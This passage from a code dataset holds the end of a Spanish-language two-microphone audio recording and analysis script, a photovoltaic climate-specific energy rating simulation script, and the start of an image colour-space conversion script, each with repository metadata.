valores_csv.append(c)\n\n\n df1 = pd.DataFrame(valores_csv[:])\n df1.to_csv(\"mfcc.csv\")\n\n if option == 10:\n aux= True\n if option == 11:\n a = pd.read_csv('nombres_diferencias.csv')\n valores = a['nombres']\n uno = str(\"1_\" + str(1559259194) + \".wav\")\n dos = str(\"2_\" + str(1559259194) + \".wav\")\n archivo = wave.open(uno, 'rb')\n archivo2 = wave.open(dos, 'rb')\n canales = archivo.getnchannels()\n frames = archivo.getframerate()\n fs = frames\n datos = archivo.getparams()\n samples = archivo.getsampwidth()\n data = archivo.readframes(-1)\n data2 = archivo2.readframes(-1)\n signal = np.frombuffer(data, 'Int16')\n signal2 = np.frombuffer(data2, 'Int16')\n fft_signal = np.fft.fft(signal)\n W = np.fft.fftfreq(len(signal))\n cut_f_signal = fft_signal.copy()\n cut_f_signal[(W < 0.01)] = 0\n cut_f_signal[(W > 0.2)] = 0\n final = np.fft.ifft(cut_f_signal)\n\n plt.plot(fft_signal)\n plt.show()\n\n else:\n print(\"opcion no valida\")\n print(\"presiona enter\")\n input()\n\n # silencio = silence.detect_silence(myaudio, min_silence_len=1, silence_thresh=16)\n\n # silencio2 = silence.detect_nonsilent(myaudio, min_silence_len=1, silence_thresh=-30)\n # silencio = [((start/1000),(stop/1000)) for start,stop in silencio] #convert to sec\n # print(silencio2)\n # print(silencio[0][1])\n # print(silencio[0][1])\n # print(silencio2[0][1])\n\n #p1 = Process(target=ejecutar_doc1())\n #p1.start()\n #p2 = Process(target=ejecutar_doc2)\n #p2.start()\n #p1.join()\n #p2.join()\n\n #hilo1 = threading.Thread(target=ejecutar_doc1(),daemon=True)\n 
#hilo2 = threading.Thread(target=ejecutar_doc2(),daemon=True)\n\n #hilo1.start()\n #hilo2.start()\n\n\n\n\n\n\n\n\n\n # graba simultaneamente 2 microfonos\n", "repo_name": "marceloespinozap/grabacion-2-mics", "sub_path": "final.py", "file_name": "final.py", "file_ext": "py", "file_size_in_byte": 53364, "program_lang": "python", "lang": "es", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "52", "api": [{"api_name": "warnings.simplefilter", "line_number": 36, "usage_type": "call"}, {"api_name": "warnings.simplefilter", "line_number": 46, "usage_type": "call"}, {"api_name": "numpy.frombuffer", "line_number": 47, "usage_type": "call"}, {"api_name": "numpy.frombuffer", "line_number": 48, "usage_type": "call"}, {"api_name": "pylab.figure", "line_number": 49, "usage_type": "call"}, {"api_name": "numpy.linspace", "line_number": 50, "usage_type": "call"}, {"api_name": "numpy.linspace", "line_number": 51, "usage_type": "call"}, {"api_name": "pylab.subplot", "line_number": 52, "usage_type": "call"}, {"api_name": "pylab.plot", "line_number": 53, "usage_type": "call"}, {"api_name": "pylab.plot", "line_number": 54, "usage_type": "call"}, {"api_name": "pylab.xlabel", "line_number": 55, "usage_type": "call"}, {"api_name": "pylab.ylabel", "line_number": 56, "usage_type": "call"}, {"api_name": "pylab.subplot", "line_number": 59, "usage_type": "call"}, {"api_name": "pylab.plot", "line_number": 60, "usage_type": "call"}, {"api_name": "pylab.plot", "line_number": 61, "usage_type": "call"}, {"api_name": "pylab.xlabel", "line_number": 62, "usage_type": "call"}, {"api_name": "pylab.ylabel", "line_number": 63, "usage_type": "call"}, {"api_name": "pylab.show", "line_number": 66, "usage_type": "call"}, {"api_name": "sounddevice.default", "line_number": 73, "usage_type": "attribute"}, {"api_name": "sounddevice.default", "line_number": 75, "usage_type": "attribute"}, {"api_name": "sounddevice.default", "line_number": 77, "usage_type": "attribute"}, {"api_name": "sounddevice.rec", "line_number": 80, "usage_type": "call"}, {"api_name": "sounddevice.wait", "line_number": 81, "usage_type": "call"}, {"api_name": "sounddevice.stop", "line_number": 83, "usage_type": "call"}, {"api_name": "soundfile.write", "line_number": 85, "usage_type": "call"}, {"api_name": "sounddevice.default", "line_number": 91, "usage_type": "attribute"}, {"api_name": "sounddevice.default", "line_number": 93, "usage_type": "attribute"}, {"api_name": "sounddevice.default", "line_number": 95, "usage_type": "attribute"}, {"api_name": "sounddevice.rec", "line_number": 97, "usage_type": "call"}, {"api_name": "sounddevice.wait", "line_number": 98, "usage_type": "call"}, {"api_name": "sounddevice.stop", "line_number": 100, "usage_type": "call"}, {"api_name": "soundfile.write", "line_number": 102, "usage_type": "call"}, {"api_name": "pydub.AudioSegment.from_wav", "line_number": 105, "usage_type": "call"}, {"api_name": "pydub.AudioSegment", "line_number": 105, "usage_type": "name"}, {"api_name": "pydub.AudioSegment.from_wav", "line_number": 106, "usage_type": "call"}, {"api_name": "pydub.AudioSegment", "line_number": 106, "usage_type": "name"}, {"api_name": "pydub.silence.detect_nonsilent", "line_number": 107, "usage_type": "call"}, {"api_name": "pydub.silence", "line_number": 107, "usage_type": "name"}, {"api_name": "pydub.silence.detect_nonsilent", "line_number": 108, "usage_type": "call"}, {"api_name": "pydub.silence", "line_number": 108, "usage_type": "name"}, {"api_name": "os.path.exists", "line_number": 112, "usage_type": "call"}, 
{"api_name": "os.path", "line_number": 112, "usage_type": "name"}, {"api_name": "pandas.DataFrame", "line_number": 114, "usage_type": "call"}, {"api_name": "os.path.exists", "line_number": 116, "usage_type": "call"}, {"api_name": "os.path", "line_number": 116, "usage_type": "name"}, {"api_name": "pandas.DataFrame", "line_number": 118, "usage_type": "call"}, {"api_name": "os.path.exists", "line_number": 120, "usage_type": "call"}, {"api_name": "os.path", "line_number": 120, "usage_type": "name"}, {"api_name": "pandas.DataFrame", "line_number": 122, "usage_type": "call"}, {"api_name": "os.path.exists", "line_number": 124, "usage_type": "call"}, {"api_name": "os.path", "line_number": 124, "usage_type": "name"}, {"api_name": "pandas.DataFrame", "line_number": 126, "usage_type": "call"}, {"api_name": "warnings.simplefilter", "line_number": 136, "usage_type": "call"}, {"api_name": "sounddevice.default", "line_number": 138, "usage_type": "attribute"}, {"api_name": "sounddevice.default", "line_number": 140, "usage_type": "attribute"}, {"api_name": "pandas.read_csv", "line_number": 188, "usage_type": "call"}, {"api_name": "time.time", "line_number": 192, "usage_type": "call"}, {"api_name": "multiprocessing.Process", "line_number": 193, "usage_type": "call"}, {"api_name": "multiprocessing.Process", "line_number": 195, "usage_type": "call"}, {"api_name": "time.sleep", "line_number": 200, "usage_type": "call"}, {"api_name": "pandas.DataFrame", "line_number": 202, "usage_type": "call"}, {"api_name": "pandas.read_csv", "line_number": 209, "usage_type": "call"}, {"api_name": "wave.open", "line_number": 216, "usage_type": "call"}, {"api_name": "wave.open", "line_number": 217, "usage_type": "call"}, {"api_name": "numpy.frombuffer", "line_number": 225, "usage_type": "call"}, {"api_name": "numpy.frombuffer", "line_number": 226, "usage_type": "call"}, {"api_name": "sounddevice.query_devices", "line_number": 231, "usage_type": "call"}, {"api_name": "pandas.read_csv", "line_number": 232, "usage_type": "call"}, {"api_name": "wave.open", "line_number": 239, "usage_type": "call"}, {"api_name": "wave.open", "line_number": 240, "usage_type": "call"}, {"api_name": "numpy.frombuffer", "line_number": 248, "usage_type": "call"}, {"api_name": "numpy.fft.fftfreq", "line_number": 249, "usage_type": "call"}, {"api_name": "numpy.fft", "line_number": 249, "usage_type": "attribute"}, {"api_name": "numpy.fft.fft", "line_number": 251, "usage_type": "call"}, {"api_name": "numpy.fft", "line_number": 251, "usage_type": "attribute"}, {"api_name": "numpy.abs", "line_number": 252, "usage_type": "call"}, {"api_name": "pylab.plot", "line_number": 255, "usage_type": "call"}, {"api_name": "pylab.xlabel", "line_number": 257, "usage_type": "call"}, {"api_name": "pylab.ylabel", "line_number": 258, "usage_type": "call"}, {"api_name": "pylab.gca", "line_number": 261, "usage_type": "call"}, {"api_name": "pylab.show", "line_number": 265, "usage_type": "call"}, {"api_name": "pandas.read_csv", "line_number": 269, "usage_type": "call"}, {"api_name": "wave.open", "line_number": 277, "usage_type": "call"}, {"api_name": "wave.open", "line_number": 278, "usage_type": "call"}, {"api_name": "numpy.frombuffer", "line_number": 286, "usage_type": "call"}, {"api_name": "numpy.fft.fftfreq", "line_number": 289, "usage_type": "call"}, {"api_name": "numpy.fft", "line_number": 289, "usage_type": "attribute"}, {"api_name": "numpy.fft.fft", "line_number": 291, "usage_type": "call"}, {"api_name": "numpy.fft", "line_number": 291, "usage_type": "attribute"}, 
{"api_name": "numpy.abs", "line_number": 292, "usage_type": "call"}, {"api_name": "numpy.fft.ifft", "line_number": 306, "usage_type": "call"}, {"api_name": "numpy.fft", "line_number": 306, "usage_type": "attribute"}, {"api_name": "scipy.io.wavfile.write", "line_number": 312, "usage_type": "call"}, {"api_name": "scipy.io.wavfile", "line_number": 312, "usage_type": "name"}, {"api_name": "numpy.frombuffer", "line_number": 313, "usage_type": "call"}, {"api_name": "numpy.fft.fft", "line_number": 314, "usage_type": "call"}, {"api_name": "numpy.fft", "line_number": 314, "usage_type": "attribute"}, {"api_name": "numpy.fft.fftfreq", "line_number": 315, "usage_type": "call"}, {"api_name": "numpy.fft", "line_number": 315, "usage_type": "attribute"}, {"api_name": "numpy.fft.fft", "line_number": 317, "usage_type": "call"}, {"api_name": "numpy.fft", "line_number": 317, "usage_type": "attribute"}, {"api_name": "pylab.xlabel", "line_number": 327, "usage_type": "call"}, {"api_name": "pylab.ylabel", "line_number": 328, "usage_type": "call"}, {"api_name": "pylab.xlabel", "line_number": 332, "usage_type": "call"}, {"api_name": "pylab.ylabel", "line_number": 333, "usage_type": "call"}, {"api_name": "numpy.fft.ifft", "line_number": 338, "usage_type": "call"}, {"api_name": "numpy.fft", "line_number": 338, "usage_type": "attribute"}, {"api_name": "scipy.io.wavfile.write", "line_number": 344, "usage_type": "call"}, {"api_name": "scipy.io.wavfile", "line_number": 344, "usage_type": "name"}, {"api_name": "pandas.read_csv", "line_number": 346, "usage_type": "call"}, {"api_name": "wave.open", "line_number": 351, "usage_type": "call"}, {"api_name": "wave.open", "line_number": 352, "usage_type": "call"}, {"api_name": "numpy.frombuffer", "line_number": 360, "usage_type": "call"}, {"api_name": "numpy.frombuffer", "line_number": 361, "usage_type": "call"}, {"api_name": "pandas.read_csv", "line_number": 386, "usage_type": "call"}, {"api_name": "pandas.read_csv", "line_number": 399, "usage_type": "call"}, {"api_name": "pandas.DataFrame", "line_number": 402, "usage_type": "call"}, {"api_name": "wave.open", "line_number": 415, "usage_type": "call"}, {"api_name": "wave.open", "line_number": 416, "usage_type": "call"}, {"api_name": "numpy.frombuffer", "line_number": 424, "usage_type": "call"}, {"api_name": "numpy.frombuffer", "line_number": 425, "usage_type": "call"}, {"api_name": "numpy.abs", "line_number": 437, "usage_type": "call"}, {"api_name": "numpy.abs", "line_number": 438, "usage_type": "call"}, {"api_name": "numpy.abs", "line_number": 475, "usage_type": "call"}, {"api_name": "numpy.abs", "line_number": 476, "usage_type": "call"}, {"api_name": "numpy.max", "line_number": 483, "usage_type": "call"}, {"api_name": "numpy.max", "line_number": 484, "usage_type": "call"}, {"api_name": "pydub.AudioSegment.from_wav", "line_number": 503, "usage_type": "call"}, {"api_name": "pydub.AudioSegment", "line_number": 503, "usage_type": "name"}, {"api_name": "pydub.AudioSegment.from_wav", "line_number": 508, "usage_type": "call"}, {"api_name": "pydub.AudioSegment", "line_number": 508, "usage_type": "name"}, {"api_name": "numpy.abs", "line_number": 527, "usage_type": "call"}, {"api_name": "numpy.abs", "line_number": 528, "usage_type": "call"}, {"api_name": "numpy.max", "line_number": 534, "usage_type": "call"}, {"api_name": "numpy.max", "line_number": 535, "usage_type": "call"}, {"api_name": "pydub.AudioSegment.from_wav", "line_number": 559, "usage_type": "call"}, {"api_name": "pydub.AudioSegment", "line_number": 559, "usage_type": 
"name"}, {"api_name": "pydub.AudioSegment.from_wav", "line_number": 564, "usage_type": "call"}, {"api_name": "pydub.AudioSegment", "line_number": 564, "usage_type": "name"}, {"api_name": "pandas.DataFrame", "line_number": 572, "usage_type": "call"}, {"api_name": "pandas.read_csv", "line_number": 576, "usage_type": "call"}, {"api_name": "wave.open", "line_number": 583, "usage_type": "call"}, {"api_name": "wave.open", "line_number": 584, "usage_type": "call"}, {"api_name": "numpy.frombuffer", "line_number": 592, "usage_type": "call"}, {"api_name": "numpy.frombuffer", "line_number": 593, "usage_type": "call"}, {"api_name": "pylab.subplot", "line_number": 594, "usage_type": "call"}, {"api_name": "pylab.title", "line_number": 595, "usage_type": "call"}, {"api_name": "pylab.plot", "line_number": 596, "usage_type": "call"}, {"api_name": "pylab.plot", "line_number": 597, "usage_type": "call"}, {"api_name": "pylab.gca", "line_number": 598, "usage_type": "call"}, {"api_name": "pylab.subplot", "line_number": 599, "usage_type": "call"}, {"api_name": "pylab.title", "line_number": 600, "usage_type": "call"}, {"api_name": "pylab.plot", "line_number": 601, "usage_type": "call"}, {"api_name": "pylab.plot", "line_number": 602, "usage_type": "call"}, {"api_name": "pylab.gca", "line_number": 603, "usage_type": "call"}, {"api_name": "pylab.show", "line_number": 604, "usage_type": "call"}, {"api_name": "pandas.read_csv", "line_number": 607, "usage_type": "call"}, {"api_name": "wave.open", "line_number": 614, "usage_type": "call"}, {"api_name": "wave.open", "line_number": 615, "usage_type": "call"}, {"api_name": "numpy.frombuffer", "line_number": 623, "usage_type": "call"}, {"api_name": "numpy.frombuffer", "line_number": 624, "usage_type": "call"}, {"api_name": "scipy.signal.spectrogram", "line_number": 625, "usage_type": "call"}, {"api_name": "scipy.signal", "line_number": 625, "usage_type": "name"}, {"api_name": "pylab.pcolormesh", "line_number": 627, "usage_type": "call"}, {"api_name": "pylab.gca", "line_number": 628, "usage_type": "call"}, {"api_name": "pylab.ylabel", "line_number": 630, "usage_type": "call"}, {"api_name": "pylab.xlabel", "line_number": 631, "usage_type": "call"}, {"api_name": "pylab.show", "line_number": 632, "usage_type": "call"}, {"api_name": "scipy.signal.spectrogram", "line_number": 633, "usage_type": "call"}, {"api_name": "scipy.signal", "line_number": 633, "usage_type": "name"}, {"api_name": "pylab.pcolormesh", "line_number": 635, "usage_type": "call"}, {"api_name": "pylab.gca", "line_number": 636, "usage_type": "call"}, {"api_name": "pylab.ylabel", "line_number": 638, "usage_type": "call"}, {"api_name": "pylab.xlabel", "line_number": 639, "usage_type": "call"}, {"api_name": "pylab.show", "line_number": 640, "usage_type": "call"}, {"api_name": "pandas.read_csv", "line_number": 643, "usage_type": "call"}, {"api_name": "wave.open", "line_number": 650, "usage_type": "call"}, {"api_name": "wave.open", "line_number": 651, "usage_type": "call"}, {"api_name": "numpy.frombuffer", "line_number": 659, "usage_type": "call"}, {"api_name": "numpy.frombuffer", "line_number": 660, "usage_type": "call"}, {"api_name": "pylab.subplot", "line_number": 662, "usage_type": "call"}, {"api_name": "pylab.title", "line_number": 663, "usage_type": "call"}, {"api_name": "pylab.plot", "line_number": 665, "usage_type": "call"}, {"api_name": "pylab.plot", "line_number": 666, "usage_type": "call"}, {"api_name": "pylab.subplot", "line_number": 674, "usage_type": "call"}, {"api_name": "pylab.title", "line_number": 
675, "usage_type": "call"}, {"api_name": "scipy.signal.fftconvolve", "line_number": 677, "usage_type": "call"}, {"api_name": "pylab.plot", "line_number": 678, "usage_type": "call"}, {"api_name": "pylab.show", "line_number": 679, "usage_type": "call"}, {"api_name": "pandas.read_csv", "line_number": 683, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 695, "usage_type": "call"}, {"api_name": "wave.open", "line_number": 701, "usage_type": "call"}, {"api_name": "wave.open", "line_number": 702, "usage_type": "call"}, {"api_name": "numpy.frombuffer", "line_number": 707, "usage_type": "call"}, {"api_name": "numpy.frombuffer", "line_number": 708, "usage_type": "call"}, {"api_name": "scipy.signal.fftconvolve", "line_number": 729, "usage_type": "call"}, {"api_name": "numpy.round", "line_number": 730, "usage_type": "call"}, {"api_name": "numpy.max", "line_number": 732, "usage_type": "call"}, {"api_name": "pylab.plot", "line_number": 796, "usage_type": "call"}, {"api_name": "pylab.show", "line_number": 797, "usage_type": "call"}, {"api_name": "python_speech_features.mfcc", "line_number": 798, "usage_type": "call"}, {"api_name": "numpy.asarray", "line_number": 798, "usage_type": "call"}, {"api_name": "numpy.log10", "line_number": 798, "usage_type": "call"}, {"api_name": "pylab.plot", "line_number": 799, "usage_type": "call"}, {"api_name": "pylab.show", "line_number": 800, "usage_type": "call"}, {"api_name": "python_speech_features.mfcc", "line_number": 801, "usage_type": "call"}, {"api_name": "numpy.asarray", "line_number": 801, "usage_type": "call"}, {"api_name": "python_speech_features.mfcc", "line_number": 802, "usage_type": "call"}, {"api_name": "numpy.asarray", "line_number": 802, "usage_type": "call"}, {"api_name": "python_speech_features.mfcc", "line_number": 803, "usage_type": "call"}, {"api_name": "numpy.asarray", "line_number": 803, "usage_type": "call"}, {"api_name": "python_speech_features.mfcc", "line_number": 804, "usage_type": "call"}, {"api_name": "numpy.asarray", "line_number": 804, "usage_type": "call"}, {"api_name": "python_speech_features.mfcc", "line_number": 805, "usage_type": "call"}, {"api_name": "numpy.asarray", "line_number": 805, "usage_type": "call"}, {"api_name": "python_speech_features.mfcc", "line_number": 806, "usage_type": "call"}, {"api_name": "numpy.asarray", "line_number": 806, "usage_type": "call"}, {"api_name": "python_speech_features.mfcc", "line_number": 807, "usage_type": "call"}, {"api_name": "numpy.asarray", "line_number": 807, "usage_type": "call"}, {"api_name": "python_speech_features.mfcc", "line_number": 808, "usage_type": "call"}, {"api_name": "numpy.asarray", "line_number": 808, "usage_type": "call"}, {"api_name": "python_speech_features.mfcc", "line_number": 809, "usage_type": "call"}, {"api_name": "numpy.asarray", "line_number": 809, "usage_type": "call"}, {"api_name": "python_speech_features.mfcc", "line_number": 810, "usage_type": "call"}, {"api_name": "numpy.asarray", "line_number": 810, "usage_type": "call"}, {"api_name": "python_speech_features.mfcc", "line_number": 811, "usage_type": "call"}, {"api_name": "numpy.asarray", "line_number": 811, "usage_type": "call"}, {"api_name": "python_speech_features.mfcc", "line_number": 812, "usage_type": "call"}, {"api_name": "numpy.asarray", "line_number": 812, "usage_type": "call"}, {"api_name": "python_speech_features.mfcc", "line_number": 813, "usage_type": "call"}, {"api_name": "numpy.asarray", "line_number": 813, "usage_type": "call"}, {"api_name": "python_speech_features.mfcc", 
"line_number": 814, "usage_type": "call"}, {"api_name": "numpy.asarray", "line_number": 814, "usage_type": "call"}, {"api_name": "python_speech_features.mfcc", "line_number": 815, "usage_type": "call"}, {"api_name": "numpy.asarray", "line_number": 815, "usage_type": "call"}, {"api_name": "python_speech_features.mfcc", "line_number": 816, "usage_type": "call"}, {"api_name": "numpy.asarray", "line_number": 816, "usage_type": "call"}, {"api_name": "python_speech_features.mfcc", "line_number": 817, "usage_type": "call"}, {"api_name": "numpy.asarray", "line_number": 817, "usage_type": "call"}, {"api_name": "python_speech_features.mfcc", "line_number": 818, "usage_type": "call"}, {"api_name": "numpy.asarray", "line_number": 818, "usage_type": "call"}, {"api_name": "python_speech_features.mfcc", "line_number": 819, "usage_type": "call"}, {"api_name": "numpy.asarray", "line_number": 819, "usage_type": "call"}, {"api_name": "python_speech_features.mfcc", "line_number": 820, "usage_type": "call"}, {"api_name": "numpy.asarray", "line_number": 820, "usage_type": "call"}, {"api_name": "python_speech_features.mfcc", "line_number": 821, "usage_type": "call"}, {"api_name": "numpy.asarray", "line_number": 821, "usage_type": "call"}, {"api_name": "python_speech_features.mfcc", "line_number": 822, "usage_type": "call"}, {"api_name": "numpy.asarray", "line_number": 822, "usage_type": "call"}, {"api_name": "python_speech_features.mfcc", "line_number": 823, "usage_type": "call"}, {"api_name": "numpy.asarray", "line_number": 823, "usage_type": "call"}, {"api_name": "python_speech_features.mfcc", "line_number": 824, "usage_type": "call"}, {"api_name": "numpy.asarray", "line_number": 824, "usage_type": "call"}, {"api_name": "python_speech_features.mfcc", "line_number": 825, "usage_type": "call"}, {"api_name": "numpy.asarray", "line_number": 825, "usage_type": "call"}, {"api_name": "python_speech_features.mfcc", "line_number": 826, "usage_type": "call"}, {"api_name": "numpy.asarray", "line_number": 826, "usage_type": "call"}, {"api_name": "python_speech_features.mfcc", "line_number": 827, "usage_type": "call"}, {"api_name": "numpy.asarray", "line_number": 827, "usage_type": "call"}, {"api_name": "python_speech_features.mfcc", "line_number": 828, "usage_type": "call"}, {"api_name": "numpy.asarray", "line_number": 828, "usage_type": "call"}, {"api_name": "python_speech_features.mfcc", "line_number": 829, "usage_type": "call"}, {"api_name": "numpy.asarray", "line_number": 829, "usage_type": "call"}, {"api_name": "pandas.DataFrame", "line_number": 990, "usage_type": "call"}, {"api_name": "pandas.read_csv", "line_number": 996, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 1007, "usage_type": "call"}, {"api_name": "librosa.load", "line_number": 1012, "usage_type": "call"}, {"api_name": "librosa.load", "line_number": 1013, "usage_type": "call"}, {"api_name": "pyAudioAnalysis.audioFeatureExtraction.stFeatureExtraction", "line_number": 1015, "usage_type": "call"}, {"api_name": "pyAudioAnalysis.audioFeatureExtraction", "line_number": 1015, "usage_type": "name"}, {"api_name": "pyAudioAnalysis.audioFeatureExtraction.stFeatureExtraction", "line_number": 1016, "usage_type": "call"}, {"api_name": "pyAudioAnalysis.audioFeatureExtraction", "line_number": 1016, "usage_type": "name"}, {"api_name": "pandas.DataFrame", "line_number": 1063, "usage_type": "call"}, {"api_name": "pandas.read_csv", "line_number": 1069, "usage_type": "call"}, {"api_name": "wave.open", "line_number": 1073, "usage_type": "call"}, 
{"api_name": "wave.open", "line_number": 1074, "usage_type": "call"}, {"api_name": "numpy.frombuffer", "line_number": 1082, "usage_type": "call"}, {"api_name": "numpy.frombuffer", "line_number": 1083, "usage_type": "call"}, {"api_name": "numpy.fft.fft", "line_number": 1084, "usage_type": "call"}, {"api_name": "numpy.fft", "line_number": 1084, "usage_type": "attribute"}, {"api_name": "numpy.fft.fftfreq", "line_number": 1085, "usage_type": "call"}, {"api_name": "numpy.fft", "line_number": 1085, "usage_type": "attribute"}, {"api_name": "numpy.fft.ifft", "line_number": 1089, "usage_type": "call"}, {"api_name": "numpy.fft", "line_number": 1089, "usage_type": "attribute"}, {"api_name": "pylab.plot", "line_number": 1091, "usage_type": "call"}, {"api_name": "pylab.show", "line_number": 1092, "usage_type": "call"}]} +{"seq_id": "42573541840", "text": "# -*- coding: utf-8 -*-\r\n\"\"\"\r\nClimate Specific Energy Rating (CSER)\r\n\r\n@author: dguzmanr\r\n@modified: mriveraa\r\n\"\"\"\r\n# Importing the Steps Function\r\nimport sim_steps\r\n# Importing the Energy rating functions\r\nimport energy_rating_functions as energy_rating\r\n# Importing read functions\r\nimport read_functions\r\nimport pandas as pd\r\n# Importing execution functions\r\nimport utils\r\nimport plotting\r\n# Import Module\r\nimport os\r\n\r\n\r\n\r\ndef get_ini_data(module_df, eta, module_area, folder_locations, site_name):\r\n # Get the interpolation object with eta, temp, irradiance, etc\r\n # From CalLab measurements\r\n eta_interpolated, pnom, eta_matrix, hey_matrix, alpha =\\\r\n energy_rating.get_eta_interpolation(module_df= module_df,\r\n module_area= module_area,\r\n eta_calc= eta)\r\n\r\n # Reading climate data\r\n climate_data = read_functions.read_climate_locs(\r\n folder_locations=folder_locations,\r\n loc_name=site_name)\r\n \r\n # Changing names to climate df for simulation\r\n climate_data = read_functions.change_names_climate_df(\r\n climate_df=climate_data)\r\n return (eta_interpolated, pnom, eta_matrix, hey_matrix, climate_data, alpha)\r\n\r\n\r\ndef get_simulation(climate_data, lat, lon, ele, alpha, tech, pnom, mod_area,\r\n eta_interpolated, u0, u1, a_r, power_matrix, pv_azimuth=180, pv_tilt=20,\r\n spec_resp_factor=1.0):\r\n\r\n # =======================================================================\r\n # Energy rating Module\r\n # =======================================================================\r\n cser_er, eta_avg_er, sim_er_df = sim_steps.ersim_dc_steps(\r\n climate_data=climate_data.copy(),\r\n pv_tilt=pv_tilt,\r\n eta_interpolated=eta_interpolated,\r\n pnom=pnom,\r\n mod_area=mod_area,\r\n u0=u0,\r\n u1=u1,\r\n a_r=a_r,\r\n spec_resp_factor=spec_resp_factor,\r\n power_matrix= power_matrix)\r\n # Creating a DataFrame with results\r\n ret_df = pd.DataFrame(columns=[\"cser_ER\", \"eta_avg_ER\"])\r\n ret_df.at[0, \"cser_ER\"] = cser_er\r\n ret_df.at[0, \"eta_avg_ER\"] = eta_avg_er\r\n return sim_er_df, ret_df\r\n\r\n\r\n\r\ndef simulation_er(folder):\r\n\r\n # =======================================================================\r\n # Folder and paths info\r\n # =======================================================================\r\n # Folder with the standard's files\r\n folder_locations = \"the_standard\"\r\n # Change the directory\r\n os.chdir(folder)\r\n #Creating directory\r\n os.makedirs('results/plots', exist_ok=True)\r\n \r\n #Create data frame for results\r\n climate = ['Tropical humid', 'Subtropical arid (desert)',\r\n 'Subtropical coastal', 'Temperate coastal',\r\n 'High elevation 
(above 3 000 m)', 'Temperate continental']\r\n results_df_cser = pd.DataFrame({\"Std_climate\": climate})\r\n results_df_eta = pd.DataFrame({\"Std_climate\": climate})\r\n\r\n # =======================================================================\r\n # Simulation for the 6 standard climates\r\n # =======================================================================\r\n\r\n # iterate through all file\r\n for file in os.listdir():\r\n # Check whether file is in text format or not\r\n if file.endswith(\".txt\"):\r\n file_path = f\"{folder}\\{file}\"\r\n \r\n (mod_parameters, spec_resp, power_matrix, ar,\r\n u0, u1, module_area, tech, int_id) = read_functions.read_callab_stdfile(path = file_path)\r\n \r\n cser = []\r\n eta = []\r\n for location in range(6):\r\n \r\n std_location = read_functions.read_standard_locations(location)\r\n # Getting initial data\r\n (eta_interpolated, pnom, eta_matrix, hey_matrix,\r\n climate_data, alpha) = get_ini_data(\r\n module_df = power_matrix,\r\n eta= False,\r\n module_area = module_area,\r\n folder_locations=folder_locations,\r\n site_name=std_location[\"loc\"])\r\n \r\n # Running simulations\r\n sim_er_df, ret_df = get_simulation(\r\n climate_data=climate_data,\r\n lat=std_location[\"site_lat\"],\r\n lon=std_location[\"site_lon\"],\r\n ele=std_location[\"site_ele\"],\r\n alpha=alpha,\r\n tech=tech,\r\n pnom=pnom,\r\n mod_area=module_area,\r\n eta_interpolated=eta_interpolated,\r\n u0=u0,\r\n u1=u1,\r\n pv_azimuth=std_location[\"pv_azimuth\"],\r\n pv_tilt=std_location[\"pv_tilt\"],\r\n a_r=ar,\r\n spec_resp_factor=spec_resp,\r\n power_matrix= power_matrix)\r\n \r\n # Results\r\n cser.append(float(ret_df[\"cser_ER\"]))\r\n eta.append(float(ret_df[\"eta_avg_ER\"]))\r\n \r\n # Plot ETA\r\n plotting.plot_eta(df = sim_er_df,\r\n res_folder= rf'{folder}\\results\\plots',\r\n module_id = int_id,\r\n location = std_location)\r\n\r\n results_df_cser[\"cser_%s\"%(int_id)] = cser\r\n results_df_eta[\"eta_%s\"%(int_id)] = eta\r\n \r\n # Plot CSER\r\n plotting.plot_cser(df = results_df_cser,\r\n res_folder= rf'{folder}\\results\\plots',\r\n module_id = int_id)\r\n \r\n # Excel file\r\n utils.write_results(df_1 = results_df_cser,\r\n df_2 = results_df_eta,\r\n folder= rf'{folder}\\results')\r\n \r\n # Summary plot\r\n plotting.plot_summary_cser(df= results_df_cser,\r\n res_folder= rf'{folder}\\results')\r\n plotting.plot_summary_eta(df= results_df_eta,\r\n res_folder= rf'{folder}\\results')\r\n return", "repo_name": "mriveraa/ER", "sub_path": "run_main.py", "file_name": "run_main.py", "file_ext": "py", "file_size_in_byte": 6242, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "52", "api": [{"api_name": "energy_rating_functions.get_eta_interpolation", "line_number": 27, "usage_type": "call"}, {"api_name": "read_functions.read_climate_locs", "line_number": 32, "usage_type": "call"}, {"api_name": "read_functions.change_names_climate_df", "line_number": 37, "usage_type": "call"}, {"api_name": "sim_steps.ersim_dc_steps", "line_number": 49, "usage_type": "call"}, {"api_name": "pandas.DataFrame", "line_number": 61, "usage_type": "call"}, {"api_name": "os.chdir", "line_number": 76, "usage_type": "call"}, {"api_name": "os.makedirs", "line_number": 78, "usage_type": "call"}, {"api_name": "pandas.DataFrame", "line_number": 84, "usage_type": "call"}, {"api_name": "pandas.DataFrame", "line_number": 85, "usage_type": "call"}, {"api_name": "os.listdir", "line_number": 92, "usage_type": "call"}, {"api_name": 
"read_functions.read_callab_stdfile", "line_number": 98, "usage_type": "call"}, {"api_name": "read_functions.read_standard_locations", "line_number": 104, "usage_type": "call"}, {"api_name": "plotting.plot_eta", "line_number": 138, "usage_type": "call"}, {"api_name": "plotting.plot_cser", "line_number": 147, "usage_type": "call"}, {"api_name": "utils.write_results", "line_number": 152, "usage_type": "call"}, {"api_name": "plotting.plot_summary_cser", "line_number": 157, "usage_type": "call"}, {"api_name": "plotting.plot_summary_eta", "line_number": 159, "usage_type": "call"}]} +{"seq_id": "35709901926", "text": "import numpy as np\nimport torch as th\nfrom pathlib import Path\nfrom tqdm import tqdm\nfrom torch.utils.data import Dataset\nfrom torchvision import transforms as th_trans\nfrom PIL import Image\nimport colorsys\nimport cv2 as cv\n\nmy_format = ([0.485, 0.456, 0.406], [0.229, 0.224, 0.225])\n\ntrans = th_trans.Compose([th_trans.RandomCrop(256),\n th_trans.ToTensor(),\n # th_trans.Normalize(mean=my_format[0],\n # std=my_format[1])\n ])\n\n\ndef trans_rgb2yiq(images):\n if images.ndim == 3:\n images = images.unsqueeze(0)\n image_Y = 0.299 * images[:, 0] + 0.587 * images[:, 1] + 0.114 * images[:, 2]\n image_I = 0.596 * images[:, 0] - 0.274 * images[:, 1] - 0.322 * images[:, 2]\n image_Q = 0.211 * images[:, 0] - 0.522 * images[:, 1] + 0.311 * images[:, 2]\n return image_Y, image_I, image_Q\n\n\ndef trans_yiq2rgb(img_Y, img_I, img_Q):\n image_R = th.clamp(img_Y + 0.956 * img_I + 0.620 * img_Q, 0, 1)\n image_G = th.clamp(img_Y - 0.272 * img_I - 0.648 